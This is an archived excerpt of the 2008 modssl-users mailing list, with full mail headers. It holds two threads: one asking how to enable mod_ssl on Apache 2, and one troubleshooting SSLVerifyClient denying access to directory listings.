Server Version: Apache/2.2.4 (Win32) mod_ssl/2.2.4 OpenSSL/0.9.8d =
mod_perl/2.0.3 Perl/v5.8.8
Server Built: Jan 9 2007 23:17:20

-Dave


On Wed, 18 Jun 2008, Tan, Liao wrote:

> David,
>
> that was what I thought earlier. But since I=B4m told this directive =
is=20
> for Apache 1.x, and not Apache 2.0 (which is mine), I wonder how =
differ=20
> the directive to include to httpd.conf. What I mean is that I think I =
hv=20
> the mod_ssl installed, but not enabled yet, and to enable, if it=B4s=20
> simply adding the directive=B4s in httpd file, and the exact syntax =
for=20
> version 2.0.
>
> Still searching for the solution.
>
> Thanks
>
> Ingrid
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 18 22:41:11 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9293314DA65; Wed, 18 Jun 2008 22:41:11 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.citigroup.com (smtp2.citigroup.com [192.193.221.103])
	by master.modssl.org (Postfix) with ESMTP id 0FB6D14D858
	for ; Wed, 18 Jun 2008 22:41:10 +0200 (CEST)
Received: from imbarc-ss01.nam.nsroot.net (imbarc-ss01.ss.ssmb.com [135.155.128.166])
	by imbaspam-ss01.namdmz.dmzroot.net (8.13.8/8.13.8/SSMB_EXT/ev: 16778 $) with ESMTP id m5IKecrx017058
	for ; Wed, 18 Jun 2008 20:40:39 GMT
Received: from mailhub-nyc4-1.ny.ssmb.com (mailhub-nyc4-1.ny.ssmb.com [162.124.152.39])
	by imbarc-ss01.nam.nsroot.net (8.13.8/8.13.8/SSMB_QQQ_IN/1.1) with ESMTP id m5IKeXGJ020758
	for ; Wed, 18 Jun 2008 20:40:33 GMT
Received: from exlmdsm02.lac.nsroot.net (EXLMDSM02.lac.nsroot.net [169.193.142.75])
	by mailhub-nyc4-1.ny.ssmb.com (8.13.8/8.13.8/CG_HUB) with ESMTP id m5IKeXdO018180
	for ; Wed, 18 Jun 2008 20:40:33 GMT
Received: from exlbrmb07.lac.nsroot.net ([169.167.113.8]) by exlmdsm02.lac.nsroot.net with Microsoft SMTPSVC(5.0.2195.6713);
	 Wed, 18 Jun 2008 16:40:33 -0400
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6619.12
Subject: RE: Need to add/enable/install mod_ssl
Date: Wed, 18 Jun 2008 17:40:31 -0300
Message-ID: <61A49EACE4B520449427D0FF6DB5E76005905FE3@exlbrmb07.lac.nsroot.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Need to add/enable/install mod_ssl
Thread-Index: AcjRgXMnkFerkpnIT3i/wfZLXYnAFQAAJG4AAABQiLA=
From: "Tan, Liao " 
To: 
X-OriginalArrivalTime: 18 Jun 2008 20:40:33.0186 (UTC) FILETIME=[8DE95820:01C8D183]
X-Scanned-By: MIMEDefang 2.52 on 169.175.16.180
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tan, Liao " 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

another information: what I see in libexec/ is just "mod_jk.sl", and =
under modules/, just the file httpd.exp.

Ingrid=20



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Tan, Liao [CMB-IT]
Sent: Wednesday, June 18, 2008 5:34 PM
To: modssl-users@modssl.org
Subject: RE: Need to add/enable/install mod_ssl


Dave and All:

Ok, now I know I can try the directives in my apache.=20
Althought by the directives SSLRandomSeed it=B4s indicating I have the =
mod_ssl installed, I checked and the files mod_ssl.so and mod_ssl.c are =
not in the paths indicated, not in libexec/, nor in module/.
How do I get those files?=20

Thank you.
Ingrid=20



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of David P. Mott
Sent: Wednesday, June 18, 2008 5:22 PM
To: modssl-users@modssl.org
Subject: RE: Need to add/enable/install mod_ssl



I pulled that exact line from my win32 version of Apache 2.2.4.

Server Version: Apache/2.2.4 (Win32) mod_ssl/2.2.4 OpenSSL/0.9.8d =
mod_perl/2.0.3 Perl/v5.8.8
Server Built: Jan 9 2007 23:17:20

-Dave


On Wed, 18 Jun 2008, Tan, Liao wrote:

> David,
>
> that was what I thought earlier. But since I=B4m told this directive =
is=20
> for Apache 1.x, and not Apache 2.0 (which is mine), I wonder how =
differ=20
> the directive to include to httpd.conf. What I mean is that I think I =
hv=20
> the mod_ssl installed, but not enabled yet, and to enable, if it=B4s=20
> simply adding the directive=B4s in httpd file, and the exact syntax =
for=20
> version 2.0.
>
> Still searching for the solution.
>
> Thanks
>
> Ingrid
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 26 17:56:17 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6A56D14DA48; Thu, 26 Jun 2008 17:56:17 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.acoveo.com (lancelot.acoveo.com [212.186.206.14])
	by master.modssl.org (Postfix) with ESMTP id 1066C14D84F
	for ; Thu, 26 Jun 2008 17:56:16 +0200 (CEST)
Received: from hacki-mobile.internal.acoveo.com (unknown [10.241.85.96])
	by mail.acoveo.com (Postfix) with ESMTP id E5C5518AE04
	for ; Thu, 26 Jun 2008 17:55:45 +0200 (CEST)
From: Florian Hackenberger 
To: modssl-users@modssl.org
Subject: SSLVerifyClient applies to parent directory
Date: Thu, 26 Jun 2008 17:55:45 +0200
User-Agent: KMail/1.9.9
MIME-Version: 1.0
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200806261755.45422.f.hackenberger@chello.at>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Florian Hackenberger 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!

First of all: Thanks for your great software, I've used it on several 
server and it proved to be very useful.

I have a little problem with the SSLVerifyClient directive on apache 
2.2.9 with mod_ssl compiled from source on debian etch. I have the 
following directory layout:

/usr/local/htdocs/directory/subdirectory

and the following configuration options (besides the defaults) in 
httpd.conf:

Listen 443

        SSLEngine On
        SSLCertificateFile /etc/apache2/ssl/acoveo.com.pem
        DocumentRoot "/usr/local/htdocs"



        SSLVerifyClient require
        SSLVerifyDepth 1


The problem is that apache denies access to:
https//MYSERVER/directory

as long as I don't present a valid client certificate.

People on freenode #apache were not able to help, therefore I'm asking 
here before filing a bug report.

Thanks in advance,
	Florian

-- 
DI Florian Hackenberger
florian@hackenberger.at
www.hackenberger.at
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 26 18:02:53 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B4C6014DA4C; Thu, 26 Jun 2008 18:02:53 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from yx-out-2324.google.com (yx-out-2324.google.com [74.125.44.30])
	by master.modssl.org (Postfix) with ESMTP id CAA2214D850
	for ; Thu, 26 Jun 2008 18:02:48 +0200 (CEST)
Received: by yx-out-2324.google.com with SMTP id 8so39264yxb.61
        for ; Thu, 26 Jun 2008 09:02:17 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from
         :user-agent:mime-version:to:subject:references:in-reply-to
         :x-enigmail-version:content-type;
        bh=OAE4G+rdWRrDHJNRO3ILd7jkT16fPI4INzJgbQ38lPA=;
        b=hp8Nw35OwKcGhiLZ3B40E56ctfbcTP5WgR7Npr5a9esOsmf9xT0zWJK9IZMRWDYVhY
         f5Fopqp/MINq7hchfd+Okbh4XZxqeDqCpos2mwyudUsSU/KtMFZsoOg1a0jaGZg2XCIK
         2ECI+O4raFNVesdx0dBO4Z7w4ZPswuJGw7Go0=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject:references
         :in-reply-to:x-enigmail-version:content-type;
        b=MXgHEpgb885KIJ2/94bwY9IdqG5GHCAS2Cu1160rZl1jeEWcgrXnqRVwaw1QgCwxYJ
         tb3lq9ZXVleFxZ1IUNLdi2tNJCovAg7+ABjqBVcMVn/v+0JMUfd5jdWCM61GrlZJi6MA
         etj0X+0x5Z2BBe0pm+Xuqd1FRNCakA3FRWtCo=
Received: by 10.102.228.2 with SMTP id a2mr36417muh.79.1214496135848;
        Thu, 26 Jun 2008 09:02:15 -0700 (PDT)
Received: from ?192.168.12.138? ( [213.41.232.32])
        by mx.google.com with ESMTPS id y6sm1247118mug.15.2008.06.26.09.02.13
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Thu, 26 Jun 2008 09:02:14 -0700 (PDT)
Message-ID: <4863BD7C.5070003@gmail.com>
Date: Thu, 26 Jun 2008 18:02:04 +0200
From: Cuesta Gilles 
User-Agent: Thunderbird 2.0.0.12 (X11/20080213)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
References: <200806261755.45422.f.hackenberger@chello.at>
In-Reply-To: <200806261755.45422.f.hackenberger@chello.at>
X-Enigmail-Version: 0.95.6
Content-Type: multipart/signed; micalg=pgp-sha1;
 protocol="application/pgp-signature";
 boundary="------------enig4B26DB51F28045A0CA77EDD2"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cuesta Gilles 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig4B26DB51F28045A0CA77EDD2
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: quoted-printable

Florian Hackenberger a =E9crit :
> Hi!
>
> First of all: Thanks for your great software, I've used it on several=20
> server and it proved to be very useful.
>
> I have a little problem with the SSLVerifyClient directive on apache=20
> 2.2.9 with mod_ssl compiled from source on debian etch. I have the=20
> following directory layout:
>
> /usr/local/htdocs/directory/subdirectory
>
> and the following configuration options (besides the defaults) in=20
> httpd.conf:
>
> Listen 443
> 
>         SSLEngine On
>         SSLCertificateFile /etc/apache2/ssl/acoveo.com.pem
>         DocumentRoot "/usr/local/htdocs"
> 
>
> 
>         SSLVerifyClient require
>         SSLVerifyDepth 1
> 
>
>  =20

Maybe try this:

Listen 443

        SSLEngine On
        SSLCertificateFile /etc/apache2/ssl/acoveo.com.pem
        DocumentRoot "/usr/local/htdocs"

	
        	SSLVerifyClient require
	        SSLVerifyDepth 1
	


--=20
Chuck Norris =E9tait champion de CounterStrike avant que l'on n'invente I=
nternet.
Gilles CUESTA - Logiciels Libres
69139920



--------------enig4B26DB51F28045A0CA77EDD2
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIY718545quQSHen8RArftAJ0SrDbOGVTG2yilwczEgGZXrbfg4wCfekuA
iJPnjUVjiBlJKxR617zySpA=
=Davj
-----END PGP SIGNATURE-----

--------------enig4B26DB51F28045A0CA77EDD2--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 26 18:09:48 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 43E7114DA48; Thu, 26 Jun 2008 18:09:48 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.acoveo.com (lancelot.acoveo.com [212.186.206.14])
	by master.modssl.org (Postfix) with ESMTP id 8C2E314D84F
	for ; Thu, 26 Jun 2008 18:09:46 +0200 (CEST)
Received: from hacki-mobile.internal.acoveo.com (unknown [10.241.85.96])
	by mail.acoveo.com (Postfix) with ESMTP id BE66718AE02
	for ; Thu, 26 Jun 2008 18:09:15 +0200 (CEST)
From: Florian Hackenberger 
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
Date: Thu, 26 Jun 2008 18:09:15 +0200
User-Agent: KMail/1.9.9
References: <200806261755.45422.f.hackenberger@chello.at> <4863BD7C.5070003@gmail.com>
In-Reply-To: <4863BD7C.5070003@gmail.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-15"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200806261809.15322.f.hackenberger@chello.at>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Florian Hackenberger 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thursday 26 June 2008, Cuesta Gilles wrote:
> Maybe try this:
>
> Listen 443
> 
>         SSLEngine On
>         SSLCertificateFile /etc/apache2/ssl/acoveo.com.pem
>         DocumentRoot "/usr/local/htdocs"
>
> 	
>         	SSLVerifyClient require
> 	        SSLVerifyDepth 1
> 	
> 

Unfortunately it leads to the same result, but thanks for the 
suggestion.

Cheers,
	Florian
-- 
DI Florian Hackenberger
florian@hackenberger.at
www.hackenberger.at
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 26 18:12:52 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4903614DA48; Thu, 26 Jun 2008 18:12:52 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id CC36914D84F
	for ; Thu, 26 Jun 2008 18:12:51 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m5QGCH1C015843;
	Thu, 26 Jun 2008 12:12:17 -0400
Received: from turnip.manyfish.co.uk (vpn-12-77.rdu.redhat.com [10.11.12.77])
	by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m5QGCGJC014008;
	Thu, 26 Jun 2008 12:12:16 -0400
Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.69)
	(envelope-from )
	id 1KBu51-000665-C8; Thu, 26 Jun 2008 17:12:15 +0100
Date: Thu, 26 Jun 2008 17:12:15 +0100
From: Joe Orton 
To: Florian Hackenberger 
Cc: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
Message-ID: <20080626161215.GA19340@redhat.com>
Mail-Followup-To: Florian Hackenberger ,
	modssl-users@modssl.org
References: <200806261755.45422.f.hackenberger@chello.at>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <200806261755.45422.f.hackenberger@chello.at>
User-Agent: Mutt/1.5.18 (2008-05-17)
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
X-Scanned-By: MIMEDefang 2.58 on 172.16.52.254
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Jun 26, 2008 at 05:55:45PM +0200, Florian Hackenberger wrote:
> 
>         SSLVerifyClient require
>         SSLVerifyDepth 1
> 
> 
> The problem is that apache denies access to:
> https//MYSERVER/directory

It denies access for what type of request, a directory listing?

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 26 18:21:33 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EAE6914DA48; Thu, 26 Jun 2008 18:21:33 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.acoveo.com (lancelot.acoveo.com [212.186.206.14])
	by master.modssl.org (Postfix) with ESMTP id 8F03514D84F
	for ; Thu, 26 Jun 2008 18:21:33 +0200 (CEST)
Received: from hacki-mobile.internal.acoveo.com (unknown [10.241.85.96])
	by mail.acoveo.com (Postfix) with ESMTP id 4F52418AE05
	for ; Thu, 26 Jun 2008 18:21:02 +0200 (CEST)
From: Florian Hackenberger 
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
Date: Thu, 26 Jun 2008 18:21:01 +0200
User-Agent: KMail/1.9.9
References: <200806261755.45422.f.hackenberger@chello.at> <20080626161215.GA19340@redhat.com>
In-Reply-To: <20080626161215.GA19340@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="utf-8"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200806261821.01812.f.hackenberger@chello.at>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Florian Hackenberger 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thursday 26 June 2008, Joe Orton wrote:
> It denies access for what type of request, a directory listing?
Yes


-- 
DI Florian Hackenberger
florian@hackenberger.at
www.hackenberger.at
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 26 20:28:25 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CE92414DA44; Thu, 26 Jun 2008 20:28:25 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from smtp7-g19.free.fr (smtp7-g19.free.fr [212.27.42.64])
	by master.modssl.org (Postfix) with ESMTP id 850CC14D84F
	for ; Thu, 26 Jun 2008 20:28:25 +0200 (CEST)
Received: from smtp7-g19.free.fr (localhost [127.0.0.1])
	by smtp7-g19.free.fr (Postfix) with ESMTP id 3B8BA32280D
	for ; Thu, 26 Jun 2008 20:27:54 +0200 (CEST)
Received: from [192.168.12.11] (lns-bzn-48f-62-147-219-210.adsl.proxad.net [62.147.219.210])
	by smtp7-g19.free.fr (Postfix) with ESMTP id BCB7A322837
	for ; Thu, 26 Jun 2008 20:27:53 +0200 (CEST)
Message-ID: <4863DFAB.1080405@gmail.com>
Date: Thu, 26 Jun 2008 20:27:55 +0200
From: "Gilles Cuesta (Gmail)" 
User-Agent: Thunderbird 2.0.0.14 (Windows/20080421)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
References: <200806261755.45422.f.hackenberger@chello.at> <4863BD7C.5070003@gmail.com> <200806261809.15322.f.hackenberger@chello.at>
In-Reply-To: <200806261809.15322.f.hackenberger@chello.at>
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Cuesta (Gmail)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Florian Hackenberger a écrit :
> On Thursday 26 June 2008, Cuesta Gilles wrote:
>   
>> Maybe try this:
>>
>> Listen 443
>> 
>>         SSLEngine On
>>         SSLCertificateFile /etc/apache2/ssl/acoveo.com.pem
>>         DocumentRoot "/usr/local/htdocs"
>>
>> 	
>>         	SSLVerifyClient require
>> 	        SSLVerifyDepth 1
>> 	
>> 
>>     
>
> Unfortunately it leads to the same result, but thanks for the 
> suggestion.
>
>   
Regarding mod_ssl:
"In per-server context it applies to the client authentication process 
used in the standard SSL handshake when a connection is established. "
"In per-directory context it forces a SSL renegotation with the 
reconfigured client verification level after the HTTP request was read 
but before the HTTP response is sent."

So maybe:

Listen 443

        SSLEngine On
        SSLCertificateFile /etc/apache2/ssl/acoveo.com.pem
        DocumentRoot "/usr/local/htdocs"

	
        	SSLVerifyClient require
	        SSLVerifyDepth 1
	


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 27 08:41:18 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7EE3D14DA64; Fri, 27 Jun 2008 08:41:18 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.acoveo.com (lancelot.acoveo.com [212.186.206.14])
	by master.modssl.org (Postfix) with ESMTP id BAEB614D86E
	for ; Fri, 27 Jun 2008 08:41:17 +0200 (CEST)
Received: from hacki-mobile.internal.acoveo.com (unknown [10.241.85.96])
	by mail.acoveo.com (Postfix) with ESMTP id 9FC8118AB1A
	for ; Fri, 27 Jun 2008 08:40:45 +0200 (CEST)
From: Florian Hackenberger 
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
Date: Fri, 27 Jun 2008 08:40:43 +0200
User-Agent: KMail/1.9.9
References: <200806261755.45422.f.hackenberger@chello.at> <20080626161215.GA19340@redhat.com> <200806261821.01812.f.hackenberger@chello.at>
In-Reply-To: <200806261821.01812.f.hackenberger@chello.at>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="utf-8"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200806270840.43515.f.hackenberger@chello.at>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Florian Hackenberger 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thursday 26 June 2008, Florian Hackenberger wrote:
> On Thursday 26 June 2008, Joe Orton wrote:
> It denies access for what type of request, a directory listing?
Ok, I think I understood the intention of your question. Accessing a 
specific file works, but getting the directory listing fails. Would 
that be a result of apache trying to access the protected directory in 
oder to read attributes for the listing, causing the certificate 
verification to kick in?

Cheers,
	Florian

-- 
DI Florian Hackenberger
florian@hackenberger.at
www.hackenberger.at
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 27 09:24:02 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 74B3814DA65; Fri, 27 Jun 2008 09:24:02 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mu-out-0910.google.com (mu-out-0910.google.com [209.85.134.187])
	by master.modssl.org (Postfix) with ESMTP id 0382514D86E
	for ; Fri, 27 Jun 2008 09:24:00 +0200 (CEST)
Received: by mu-out-0910.google.com with SMTP id w8so128287mue.1
        for ; Fri, 27 Jun 2008 00:23:27 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from
         :user-agent:mime-version:to:subject:references:in-reply-to
         :x-enigmail-version:content-type;
        bh=OxgJft4VZRsLJZog0G1luKDN/30qhgaHEBMSrCkYBsE=;
        b=Om7tM3B6QxTvhfuQItB54nxOeDyr1TFRMZKYDW4XO75fyrrWGdhVCbw1zcmH0JDdaC
         qrvP1EGgbDjSrlAC6mwgOFiTRNNEAHuL+L/TNavc2FmJj3YQiuMrElb/PlXEsCX0d5E7
         pWuQwEFoEd12xBHNe0JMTNuucU9RYv6s2qW44=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject:references
         :in-reply-to:x-enigmail-version:content-type;
        b=hnLuJaTBz1zqRGk8um+MnX5uEiWaqWXD48v/lJGhGkYwbfwSKTDigp2xc1fi4LIL4h
         YZ3anAQnPAEKQDopmZa32FsVXBgrivfx1Or4rG3XWMC64rggvBEjnIfGd79sx/n/lpA8
         BFk6dvwnxx/BLuYwlJTeeP2/yq3dfVez5lqbU=
Received: by 10.103.215.17 with SMTP id s17mr511973muq.61.1214551407505;
        Fri, 27 Jun 2008 00:23:27 -0700 (PDT)
Received: from ?192.168.12.138? ( [213.41.232.32])
        by mx.google.com with ESMTPS id b9sm1726479mug.13.2008.06.27.00.23.25
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Fri, 27 Jun 2008 00:23:26 -0700 (PDT)
Message-ID: <48649568.2080903@gmail.com>
Date: Fri, 27 Jun 2008 09:23:20 +0200
From: Cuesta Gilles 
User-Agent: Thunderbird 2.0.0.12 (X11/20080213)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
References: <200806261755.45422.f.hackenberger@chello.at> <20080626161215.GA19340@redhat.com> <200806261821.01812.f.hackenberger@chello.at> <200806270840.43515.f.hackenberger@chello.at>
In-Reply-To: <200806270840.43515.f.hackenberger@chello.at>
X-Enigmail-Version: 0.95.6
Content-Type: multipart/signed; micalg=pgp-sha1;
 protocol="application/pgp-signature";
 boundary="------------enig446AEBAC6C5AF6BCD22FAC91"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cuesta Gilles 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig446AEBAC6C5AF6BCD22FAC91
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: quoted-printable

Florian Hackenberger a =C3=A9crit :
> On Thursday 26 June 2008, Florian Hackenberger wrote:
>  =20
>> On Thursday 26 June 2008, Joe Orton wrote:
>> It denies access for what type of request, a directory listing?
>>    =20
> Ok, I think I understood the intention of your question. Accessing a=20
> specific file works, but getting the directory listing fails. Would=20
> that be a result of apache trying to access the protected directory in =

> oder to read attributes for the listing, causing the certificate=20
> verification to kick in?
>
>  =20

It's more an apache specific question; try setting
Options +Indexes
in your vhost, allowing directory listing.

--=20
Beaucoup d'hommes ont recherch=C3=A9 la bo=C3=AEte de pandore =C3=A0 trav=
ers le monde, pendant ce temp Chuck Norris l'utilisait pour ranger ses ch=
aussures.
Gilles CUESTA - Logiciels Libres
69139920



--------------enig446AEBAC6C5AF6BCD22FAC91
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIZJVo545quQSHen8RAp2iAJoDO3dazNvYBHs3Gicvzkeh47KRgACfUiiv
KQql95PZLRMfPo0kCi4QAEo=
=rlrb
-----END PGP SIGNATURE-----

--------------enig446AEBAC6C5AF6BCD22FAC91--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 27 09:27:52 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A187A14DA64; Fri, 27 Jun 2008 09:27:52 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.acoveo.com (lancelot.acoveo.com [212.186.206.14])
	by master.modssl.org (Postfix) with ESMTP id 52D1F14D86E
	for ; Fri, 27 Jun 2008 09:27:51 +0200 (CEST)
Received: from hacki-mobile.internal.acoveo.com (unknown [10.241.85.96])
	by mail.acoveo.com (Postfix) with ESMTP id DB30518ADF6
	for ; Fri, 27 Jun 2008 09:27:19 +0200 (CEST)
From: Florian Hackenberger 
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
Date: Fri, 27 Jun 2008 09:27:19 +0200
User-Agent: KMail/1.9.9
References: <200806261755.45422.f.hackenberger@chello.at> <200806270840.43515.f.hackenberger@chello.at> <48649568.2080903@gmail.com>
In-Reply-To: <48649568.2080903@gmail.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-15"
